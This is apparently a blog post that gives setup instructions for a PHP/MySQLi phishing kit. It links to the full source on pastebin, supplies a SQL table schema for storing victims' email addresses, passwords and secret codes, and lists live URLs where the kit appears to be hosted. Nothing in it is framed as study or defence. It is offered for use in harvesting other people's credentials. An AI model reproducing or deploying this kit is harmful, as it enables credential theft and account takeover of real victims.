[MySQLi - OOP] Phishing - DB

Full Source : http://pastebin.com/K5bKMJLx[1]

/.Tutorial

1.Set Up Your MySQL User,Password and DB_Name.

2.Find $username,$password,$dbname and replace it.

3.Open phpmyadmin,excute this SQL .
CREATE TABLE phish(

id INT NOT NULL AUTO_INCREMENT,

PRIMARY KEY(id),

username TEXT,

password TEXT,

victimemail TEXT,

victimpass TEXT,

secretcode TEXT

)
4.If Created,Just Paste INDEX.php to index.php and etc.

Live :

– http://v1.hpi.or.id/phish/index.php (INDEX.php)

– http://v1.hpi.or.id/phish/register.php (REGISTER.php)

– http://v1.hpi.or.id/phish/login.php (LOGIN.php)

[2][3][4][5][6]

References

  1. ^ http://pastebin.com/K5bKMJLx (pastebin.com)
  2. ^ (www.blogger.com)
  3. ^ (www.blogger.com)
  4. ^ (www.blogger.com)
  5. ^ (www.blogger.com)
  6. ^ (www.blogger.com)

Sumber : http://0b0xed.tor.my/




0 Response to "[MySQLi - OOP] Phishing - DB"

Post a Comment